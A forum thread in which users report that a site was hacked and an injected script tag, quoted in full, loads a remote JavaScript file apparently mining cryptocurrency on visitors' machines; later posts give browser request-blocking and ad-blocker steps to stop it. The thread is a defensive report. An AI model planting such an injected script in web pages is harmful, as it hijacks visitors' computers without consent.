Results 1 to 9 of 9

Thread: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

  1. #1

    Exclamation ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    ThongKing,

    Lately while using the site, I've noticed that my laptop fans would spin so much that it would practically hover.

    I dug into it for a bit and noticed that there's a bit of javascript being loaded on (almost) every page that causes the CPU to spike to 100%. I THINK the script is actually trying to mine bitcoin on each user machine..but I haven't looked into what it's doing.

    There's a snippet at the end of many of the php files that run the site that looks like:

    Code:
    <script src="http://absenteb.beget.tech/jafdhgkdasjfhguerh.js"></script>
    This causes the "jafdhgkdasjfhguerh.js" javascript file to be loaded by a users browser and causes serious issues for every user of the site.

    If you google that script name: "jafdhgkdasjfhguerh", you will see numerous reports citing this script as a malicious script that should be removed.

    So yes ó the site has been hacked and this javascript snippet is causing major issues with user's computers.

    Please remove it! And if you need help removing it, I'm offering my services!


    In the meantime, I'm an advanced user and I've blocked all requests from my browser to the api.gearch.info url, and things are operating as normal for me. But others probably don't know how to do that

    So ThongKing (or any other site administrator), please help us!

  2. Sponsored Links
  3. #2

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    Iím so glad youíve found this. I had no idea what was causing my Laptop to sudden go nuts, but glad to now know

  4. Sponsored Links
  5. #3
    Administrator ThongKing's Avatar
    Join Date
    Mar 2014
    Location
    London
    Posts
    3,227

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    Thanks for letting me know. Any idea how to get rid of it from a vbulletin site.

    Had a quick google but my tech skills aren't great.

    If not I will have to hire a free lance guy. Expensive though ***Sigh*** Why can't things ever be straight forward
    Check out my other thong website - ThongKing.com
    Get the password for the Celebrity Thong Videos & Leaks Sections (Patreon Method) Here
    Get the password for the Celebrity Thong Videos & Leaks Sections (YouTube Method) - HERE
    Follow me on Twitter - @Thong_King
    Please support the site and help to keep it alive - My Patreon
    Email me - mrthongking@gmail.com

  6. Sponsored Links
  7. #4

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    Hey,
    any news on this topic?
    It's indeed very annoying...
    Or gstringaddict do have any advice on how to block the requests?

  8. Sponsored Links
  9. #5

    Post Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    mojo, et al.

    I've DMed ThongKing saying that I am willing to assist in fixing this problem and he has not responded yet. I hopeful that I can get access and fix this problem once and for all

    In the meantime, here's a fairly easy solution for blocking the malicious script from running:

    This is for Google Chrome

    1. First click on the menu (three dots) at the top-right of the browser and select More Tools -> Developer Tools.
    2. This opens up the Developer tools box.
      Now click on the menu (three dots) at the top-right of the Developer Tools box and select More tools -> Request blocking
    3. This will open up the Request blocking menu.
      Check the Enable request blocking selection then click the + to add a new pattern.

      Enter api.gearch.info into the box and click Add.
    4. Now if you refresh the whaletail-forum page, or navigate to the site, you should see this type of activity in the Network tab of the Developer tools

      Where requests to the api.gearch.info domain are being blocked successfully.


    A couple caveats
    • This will only work while the Developer tools menu is open and the request blocking check is checked.
    • If you have multiple tabs open, you must perform this on each tab (the request blocking feature only applies to the current tab).


    mojo, let me know if you run into any issues with this and I'll gladly help.

  10. Sponsored Links
  11. #6

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    Thanks a lot gstringaddict!

    Your solution led me in the right direction!

    I'm using firefox and couldn't find a "Request blocking" tool there (although that doesn't mean, that it doesn't exist...).
    However, you can use an extension, e.g. "Request Blocker" or "Adblock Plus".

    For the "Request Blocker" you just have to add the URL "http://absenteb.beget.tech/jafdhgkdasjfhguerh.js".
    For "Adblock Plus" you have to create your own filter list in the advanced settings and include the same URL "http://absenteb.beget.tech/jafdhgkdasjfhguerh.js"

    Solves the problem with high CPU load for me and I don't have to have the developer tools open and works for several open tabs

  12. Sponsored Links
  13. #7

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    To say thanks to the people that know wtf is wrong would be a true understatement - but for us that have no fuckin clue what this all means, when will it be fixed to the point where none of us need to care again?

  14. Sponsored Links
  15. #8

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    i also would like to know when this will be fixed?

  16. Sponsored Links
  17. #9

    Re: ATTENTION ThongKing and Admins: Malicious javascript causing 100% CPU on the site

    it seems fixed now?

  18. Sponsored Links

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •